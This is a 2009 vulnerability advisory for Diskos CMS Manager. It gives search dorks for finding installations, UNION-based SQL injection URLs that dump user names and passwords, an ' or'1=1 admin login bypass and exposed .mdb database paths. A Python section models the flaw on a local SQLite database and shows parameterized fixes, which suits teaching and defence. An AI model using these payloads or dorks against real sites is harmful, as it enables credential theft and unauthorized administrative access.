Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass



EKU-ID: 16122 CVE: OSVDB-53007;CVE-2009-4799;OSVDB-53006;OSVDB-53005;CVE-2009-4798 OSVDB-ID:
Author: AnGeL25dZ Published: 2009-03-30 Verified: Verified


************************************************************
**         Diskos CMS Manager - multiple vulnerabilities
************************************************************
**  Product:		Diskos CMS Manager
**  Home   : 		http://www.diskos.dk
**  Vulnerability :	SQL Injection, admin bypass & database disclosure
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovered by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com
** *********************************************************
** Greetz to :	 ALLAH
**		 All Members of H-T (http://h-t.cc/cc)
**		 All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit:
** USERS    : http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** PASSWORDS: http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
**************************************************************
**
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb
**                  artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************
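The two injection points above (the kat parameter of side.asp and the diskos6 login form) both come from the same defect: user input concatenated straight into the SQL string. The following Python model is an added example, not code from the advisory or from Diskos; the real application is classic ASP over Access .mdb files, which is stood in for here by an in-memory SQLite database. Table and column names brugere, brugerid and password are taken from the advisory's payloads; the article table artikler and its columns kat and titel, the row contents, and plaintext password storage (implied by the payload selecting password directly) are all assumptions. The UNION payloads are the advisory's own, URL-decoded; the fixed variants show the parameterized queries that close both holes.

```python
import sqlite3
from urllib.parse import unquote_plus

# The advisory's payloads, exactly as they appear in the side.asp URLs
# ('+' is form encoding for a space).
PAYLOAD_USERS = "-1+union+all+select+brugerid+from+brugere"
PAYLOAD_PASSWORDS = "-1+union+all+select+password+from+brugere"
# The advisory's login-bypass value, entered in both the brugerid and password fields.
PAYLOAD_LOGIN = "' or'1=1"


def make_db():
    """Constructed stand-in for the site's .mdb files (schema and rows are assumed)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artikler (id INTEGER, kat INTEGER, titel TEXT);
        INSERT INTO artikler VALUES (1, 1, 'Forside'), (2, 1, 'Nyheder'), (3, 2, 'Produkter');
        CREATE TABLE brugere (brugerid TEXT, password TEXT);
        INSERT INTO brugere VALUES ('admin', 's3cret'), ('redaktor', 'hunter2');
    """)
    return con


def vulnerable_side(con, kat):
    """Models side.asp: the kat query-string value is glued into the SQL text,
    so '-1 union all select ...' turns a category lookup into a dump of brugere."""
    sql = "SELECT titel FROM artikler WHERE kat=" + unquote_plus(kat)
    return [row[0] for row in con.execute(sql)]


def fixed_side(con, kat):
    """Hardened side.asp: kat must be an integer and is bound as a parameter,
    so the payload is never parsed as SQL (a non-numeric kat yields no rows)."""
    try:
        kat_int = int(unquote_plus(kat))
    except ValueError:
        return []
    return [row[0] for row in con.execute("SELECT titel FROM artikler WHERE kat=?", (kat_int,))]


def vulnerable_login(con, brugerid, password):
    """Models the diskos6 login: both fields concatenated into the WHERE clause.
    With the advisory's value in both fields the clause becomes
    brugerid='' or'1=1' AND password='' or'1=1', whose trailing OR is always true."""
    sql = ("SELECT brugerid FROM brugere WHERE brugerid='" + brugerid
           + "' AND password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def fixed_login(con, brugerid, password):
    """Hardened login: both values bound as parameters; the quote in the payload
    is just data, so only a real brugerid/password pair matches."""
    row = con.execute(
        "SELECT brugerid FROM brugere WHERE brugerid=? AND password=?",
        (brugerid, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, kat=1:      ", vulnerable_side(db, "1"))
    print("vulnerable, USERS dork: ", vulnerable_side(db, PAYLOAD_USERS))
    print("vulnerable, PASSWORDS:  ", vulnerable_side(db, PAYLOAD_PASSWORDS))
    print("fixed, USERS dork:      ", fixed_side(db, PAYLOAD_USERS))
    print("vulnerable login bypass:", vulnerable_login(db, PAYLOAD_LOGIN, PAYLOAD_LOGIN))
    print("fixed login bypass:     ", fixed_login(db, PAYLOAD_LOGIN, PAYLOAD_LOGIN))
```

The UNION payload works because the injected SELECT returns the same number of columns as the original query (one here, as the advisory's single-column payloads imply); the -1 category guarantees the legitimate query contributes no rows, so the page renders only the attacker's rows. The login bypass does not need the classic ' or '1'='1 form: in Access-style boolean evaluation the stray string '1=1' after the OR is enough to make the clause true. In the hardened versions the same input reaches the database only as a bound value, which is the check to apply to every other parameter in side.asp and the diskos6 admin pages.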

# milw0rm.com [2009-03-30]